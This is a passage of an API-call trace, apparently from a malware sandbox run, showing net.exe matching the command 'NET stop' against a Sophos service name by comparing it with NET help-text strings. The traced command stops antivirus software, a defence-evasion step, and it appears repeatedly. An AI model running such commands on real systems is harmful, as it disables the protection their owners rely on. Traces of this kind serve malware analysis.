dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc7 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET USER\r\n[username [pas", _MaxCount=0x18) returned -2 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x47 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET VIEW\r\n[\\\\computernam", _MaxCount=0x18) returned -3 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc2 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NET\r\n [ ACCOUNTS | CO", _MaxCount=0x18) returned 19 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x319 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="SERVICES\r\nNET START can ", _MaxCount=0x18) returned -5 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x483 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="SYNTAX\r\nThe following co", _MaxCount=0x18) returned -5 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xa86 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="NAMES\r\nThe following typ", _MaxCount=0x18) returned 4 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x54 [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean", _String2="\r\nFor more information o", _MaxCount=0x18) returned 97 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xad [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x2e [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x7d [0199.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0199.160] LocalFree (hMem=0x8a5630) returned 0x0 [0199.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x26 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x19 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x1b [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xbe [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x33 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x19 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0xc1 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x16 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x33 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x234 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x13 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0199.161] LocalFree (hMem=0x8a5630) returned 0x0 [0199.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x14 [0199.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a5630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a5630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="瘰\x8a⡋瓢2嘰\x8a2") returned 0x15 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a7630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2瘰\x8a2") returned 0x16 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x11 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x14 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x12 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xf [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x17 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x18 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x2a [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x15 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0199.162] LocalFree (hMem=0x8a9630) returned 0x0 [0199.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x58 [0199.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x184 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xc7 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x47 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xc2 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x319 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x483 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xa86 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x54 [0199.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xad [0199.163] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0199.163] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x2e [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x7d [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x26 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x19 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x1b [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xbe [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x33 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x19 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xc1 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x16 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x33 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x234 [0199.164] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0199.164] LocalFree (hMem=0x8a9630) returned 0x0 [0199.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x13 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x14 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x14 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x15 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x15 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x16 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x11 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x14 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0x12 [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree (hMem=0x8a9630) returned 0x0 [0199.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="阰\x8a⡋瓢2阰\x8a2") returned 0xf [0199.165] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.165] LocalFree 